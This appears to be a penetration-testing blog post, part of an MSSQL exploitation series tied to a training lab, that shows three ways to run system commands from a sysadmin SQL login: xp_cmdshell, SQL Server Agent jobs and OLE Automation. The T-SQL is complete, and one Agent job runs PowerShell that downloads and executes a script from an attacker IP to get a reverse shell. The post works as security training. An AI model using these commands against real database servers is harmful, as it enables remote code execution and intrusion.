Post

3. Command Execution

MSSQL server enumeration and exploitation series

Posted
By Zyad Elsayed
5 min read
3. Command Execution

🧨 Command Execution Methods

MSSQL Server provides several ways to execute system-level commands, which attackers or penetration testers may leverage for post-exploitation. These include:

  1. Using xp_cmdshell
  2. Creating malicious SQL Server Agent Jobs
  3. Leveraging OLE Automation Procedures

⚠️ Important: These features are usually disabled by default for security reasons. You must be a member of the sysadmin role to enable and use them.

1
2

EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;

✅ Requirements

To perform command execution in MSSQL Server:

  • You must have sysadmin privileges to enable advanced options or run high-privileged features.
  • MSSQL Server must allow enabling features like xp_cmdshell, Agent Jobs, or OLE Automation.
  • Ensure the target MSSQL instance is configured and not hardened (some servers disable or restrict these capabilities in production).
  • For Agent Jobs: The SQL Server Agent service must be running.

1. 🚀 Command Execution via xp_cmdshell

xp_cmdshell is a built-in stored procedure that allows executing system commands directly via cmd.exe using T-SQL .

  • ⚙️ Requirements
    • sysadmin privileges
    • xp_cmdshell must be enabled

  • 🧱 Steps to Enable xp_cmdshell

    1
2
3
4

      EXEC sp_configure 'show advanced options', 1;
  RECONFIGURE;
  EXEC sp_configure 'xp_cmdshell', 1;
  RECONFIGURE;

  • ▶️ Usage Example

    1

      EXEC xp_cmdshell 'ipconfig';

    image.png

    This spawns a cmd.exe process as a child of the sqlservr.exe process.

    image.png

    The command runs under the context of the SQL Server service account (e.g., NT AUTHORITY\SYSTEM or a custom SQL service account).

  • 🧹 Cleanup:

    To disable it again after use:

    1
2
3
4

      EXEC sp_configure 'xp_cmdshell', 0;
  RECONFIGURE;
  EXEC sp_configure 'show advanced options', 0;
  RECONFIGURE;

2. 🧨 Command Execution via SQL Server Agent Jobs

SQL Server Agent Jobs are scheduled tasks used to automate database operations. If the SQL Server Agent service is running, jobs can be abused to execute arbitrary commands.

  • 🧱 Requirements
    • SQL Server Agent service must be running.
    • User must have sysadmin rights.

  • 🧪 Normal Agent Job

    1
2
3
4
5
6
7

      USE msdb;
  EXEC dbo.sp_add_job @job_name = N'MyJob';
  EXEC sp_add_jobstep 
      @job_name = N'MyJob',
      @step_name = N'SampleStep',
      @subsystem = N'TSQL',
      @command = N'ALTER DATABASE SALES SET READ_ONLY';

  • 👷 Normal Job Creation Example

    Weekly Sales Data Backup runs once at 23:30:00

    1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17

      USE msdb;
  EXEC sp_add_job @job_name = N'Weekly Sales Data Backup';
  EXEC sp_add_jobstep
      @job_name = N'Weekly Sales Data Backup',
      @step_name = N'Set DB ReadOnly',
      @subsystem = N'TSQL',
      @command = N'ALTER DATABASE SALES SET READ_ONLY',
      @retry_attempts = 5,
      @retry_interval = 5;
  EXEC sp_add_schedule
      @schedule_name = N'RunOnce',
      @freq_type = 1,
      @active_start_time = 233000;
  EXEC sp_attach_schedule
      @job_name = N'Weekly Sales Data Backup',
      @schedule_name = N'RunOnce';
  EXEC sp_add_jobserver @job_name = N'Weekly Sales Data Backup';

  • 💥 Malicious Job using PowerShell Subsystem

    SQL Server provides CmdExec and PowerShell subsystems that can be used to execute system commands and PowerShell scripts, respectively.

    You can create a SQL Server Agent job with a step that uses the PowerShell subsystem to download and execute a script hosted on your machine.

    Instead of scheduling the job, you can start it immediately using the sp_start_job stored procedure.

    To run a PowerShell script (e.g., for a reverse shell):

    1
2
3
4
5
6
7
8
9

      USE msdb;
  EXEC sp_add_job @job_name = N'Malicious Job';
  EXEC sp_add_jobstep 
      @job_name = N'Malicious Job',
      @step_name = N'Execute PowerShell Script',
      @subsystem = N'PowerShell',
      @command = N"(New-Object Net.WebClient).DownloadString('http://10.10.14.104/a') | IEX;";
  EXEC sp_add_jobserver @job_name = N'Malicious Job';
  EXEC sp_start_job @job_name = N'Malicious Job';

    The remote file a would typically contain a PowerShell reverse shell payload.

    image.png

    🚨 Security Note

    • SQL Server Agent often runs as NT SERVICE\SQLSERVERAGENT
    • This account typically holds SeImpersonatePrivilege, which can be escalated via “Potato” attacks to SYSTEM

  • 🧹 Cleanup:

    1

      EXEC sp_delete_job @job_name = N'Malicious Job';

3. 🎮 Command Execution via OLE Automation Procedures

OLE Automation allows executing Windows COM objects from T-SQL. This feature is disabled by default but can be enabled if you have sysadmin access.

It utilizes stored procedures such as sp_OACreate and sp_OAMethod.

Leverages OLE Automation allows T-SQL to interact with other languages like VBScript to run system commands.

For example, you can use it to create a wscript.shell object and execute arbitrary system commands directly from SQL Server.

  • ⚙️ Requirements
    • sysadmin privileges
    • OLE Automation must be enabled

  • ✅ Enabling OLE Automation

    1
2
3
4

      EXEC sp_configure 'show advanced options', 1;
  RECONFIGURE;
  EXEC sp_configure 'ole automation procedures', 1;
  RECONFIGURE;

  • ▶️ Example Command Execution

    1
2
3
4

      DECLARE @objShell INT;
  DECLARE @output varchar(8000);
  EXEC sp_OACreate 'WScript.Shell', @objShell OUTPUT;
  EXEC sp_OAMethod @objShell, 'Run', NULL, 'cmd.exe /c "whoami > C:\Windows\Tasks\tmp.txt"';

    image.png

    • This will run whoami and save the output to a text file.
    • Useful when no direct output is needed and the file system is writable.
  • 🧠 Notes
    • Uses COM objects (similar to VBScript)
    • Commands are executed using the SQL Server process’s privileges

  • 🧹 Cleanup

    1
2
3
4

      EXEC sp_configure 'ole automation procedures', 0;
  RECONFIGURE;
  EXEC sp_configure 'show advanced options', 0;
  RECONFIGURE;
  • 🔒 Post-Exploitation Hygiene

After executing commands:

  • Disable features you’ve enabled (xp_cmdshell, OLE Automation)
  • Remove malicious jobs (sp_delete_job)
  • Audit logs and configuration
  • Check for spawned processes using tools like Sysinternals Process Explorer or PowerShell

📌 Summary Table For the used methods

MethodRequires sysadminNeeds Extra ConfigExternal Service NeededCan Run Arbitrary CMDs
xp_cmdshellEnable xp_cmdshell
Agent Job (CmdExec/PS)SQL Agent Running✅ (SQL Server Agent)
OLE AutomationEnable ole automation procedures
Active Directory, MSSQL
Active Directory MSSQL RCE HTB Academy
This post is licensed under CC BY 4.0 by the author.